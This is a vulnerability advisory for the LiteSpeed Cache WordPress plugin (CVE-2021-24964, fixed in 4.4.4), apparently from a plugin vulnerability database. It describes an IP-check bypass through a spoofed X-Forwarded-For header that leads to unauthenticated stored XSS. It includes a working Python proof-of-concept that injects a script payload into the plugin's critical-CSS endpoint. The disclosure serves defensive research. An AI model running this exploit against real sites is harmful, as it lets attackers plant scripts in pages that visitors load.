WordPress Plugin Vulnerabilities

LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS

Description

The plugin does not properly verify that requests are coming from QUIC.cloud servers, allowing attackers to make requests to certain endpoints by using a specific X-Forwarded-For header value. In addition, one of the endpoint could be used to set CSS code if a setting is enabled, which will then be output in some pages without being sanitised and escaped. Combining those two issues, an unauthenticated attacker could put Cross-Site Scripting payloads in pages visited by users.

Proof of Concept

The "Load CSS Asynchronously" setting in the Page Optimization (/wp-admin/admin.php?page=litespeed-page_optm) needs to be turned on for this to work

#!/bin/python3
import requests
import json

def get_whitelist_ips():
    return requests.get("https://quic.cloud/ips", verify=False).text

print("[+] Getting the whitelisted ips...")

whitelist_ip = get_whitelist_ips().split("<br />")[0]

print(f"[+] Using {whitelist_ip}")

payload = "</style><script>alert(/XSS-cache/);</script>"
site = "https://example.com"

def poison(poison_keys, whitelist_ip):
    for poison_key in poison_keys:
        obj = {
        "status": "done",
        "data": {}
        }
        obj['data'][poison_key] = payload
        res = requests.post(f"{site}/wp-json/litespeed/v1/notify_ccss", data=json.dumps(obj), headers={"X-Forwarded-For": whitelist_ip}, verify=False).json()
        if res['count'] == 1:
            print(f"We have successfully poisoned the {poison_key} key!")
        else:
            print(f"Failed to poison the {poison_key} key")


def get_keys_from_ccss(res):
    obj = json.loads(res)
    return [key for key in obj.keys() if "litespeed_conf.dat" not in obj[key]['url']]

while True:
    res = requests.get(f"{site}/wp-content/litespeed/ccss/.litespeed_conf.dat", verify=False).text
    #print("Waiting for ccss queue file to show up...")
    if '","user_agent":"' in res:
        #print(res)
        poison_keys = get_keys_from_ccss(res)
        poison(poison_keys, whitelist_ip)

Affects Plugins

Plugin icon
litespeed-cache
Fixed in 4.4.4

References

CVE
CVE-2021-24964

Miscellaneous

Original Researcher
Emil Kylander
Submitter
Emil Kylander
Submitter website
https://emilkylander.se
Submitter twitter
emilkylander
Verified
Yes
WPVDB ID
e9966b3e-2eb9-4d70-8c18-6a829b4827cc

Timeline

Publicly Published
2021-11-30 (about 2 years ago)
Added
2021-11-30 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2020-05-19
Title
WP Frontend Profile < 1.2.2 - CSRF Check Incorrectly Implemented
Published
2017-02-01
Title
WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
Published
2016-04-25
Title
iThemes Security <= 5.3.5 - Lack of Capability Check
Published
2016-09-26
Title
W3 Total Cache < 0.9.5 – Unauthenticated Security Token Bypass
Published
2022-12-27
Title
FluentAuth < 1.0.2 - Bypass blocks by IP Spoofing